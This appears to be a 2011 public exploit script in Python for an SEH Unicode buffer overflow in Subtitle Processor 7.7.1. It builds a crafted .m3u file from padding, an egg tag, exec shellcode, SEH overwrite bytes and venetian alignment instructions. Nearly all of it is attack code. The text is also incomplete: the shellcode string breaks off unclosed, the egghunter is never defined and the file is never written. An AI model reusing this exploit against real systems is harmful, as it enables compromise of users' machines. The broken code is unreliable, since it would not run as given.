Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit

2011-04-27 09:15:05

# I wanted to first of all thank all the people who took the time to help me.
# Peter Van Eeckhoutte AKA corelanc0d3r. Awesome tutorials and thanks for putting up with me!
# Jason Kratzer. Thanks a lot for helping me finish this exploit and showing me techniques!
# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow
# Download:
# Version 7.7.1
# Author: Brandon Murphy
# Tested on Windows XP Pro SP3
# Author notified of vulnerability by email 12/11/2010
# No reply from author: Released exploit to public 4/26/2011

print "#=========================================================#"
print "# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow #"
print "# Vulnerability found & exploit written by Brandon Murphy #"
print "# Fallow: @MK1234Tfan #"
print "#=========================================================#"

junk = "\x41" * 70
tag = "s1cks1ck"

# msfpayload windows/exec CMD=calc.exe 496
shellcode = ("\x89\xe5\xdd\xc2\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"

junk2 = "\x41" * 3531
nseh = "\x61\x62"

# ppr 005700b4 Subtitleprocessor.exe
seh = "\xb4\x57"

# Venetian
# Align:
# add byte ptr [esi],ch - \x6e
# pop ebp - \x55
# add byte ptr [esi],ch - \x6e
# pop eax - \x58
# add byte ptr [esi],ch - \x6e
# add eax,0x11001400 - \x05\x14\x11
# add byte ptr [esi],ch - \x6e
# sub eax,0x11001300 - \x2d\x13\x11
# add byte ptr [esi],ch - \x6e
# Jump:
# push eax - \x50
# add byte ptr [esi],ch - \x6e
# ret - \xc3

align = "\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"
jmp = "\x50\x6e\xc3"
junk3 = "\x44" * 108

payload = junk + tag + shellcode + junk2 + nseh + seh + align + jmp + junk3 + egghunter
make = open("exploit.m3u",'w')
print "[+] Go Go Gadget SEH unicode!"
print "[-] Something went wrong...</3"


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